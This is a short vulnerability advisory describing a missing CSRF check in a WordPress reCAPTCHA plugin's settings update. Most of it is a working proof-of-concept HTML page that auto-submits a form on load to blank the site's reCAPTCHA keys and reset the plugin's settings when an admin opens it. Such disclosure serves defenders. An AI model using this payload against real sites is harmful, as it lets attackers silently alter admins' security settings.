Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Have an admin open an HTML page containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=recaptcha-jetpack" method="post">
<input type="hidden" name="site_key" value="" />
<input type="hidden" name="secret_key" value="" />
<input type="hidden" name="recaptcha_type" value="v2" />
<input type="hidden" name="reset" value="Reset to Defaults" />
<input type="submit" name="enter" id="enter" value="Submit">
</form>
</body>
```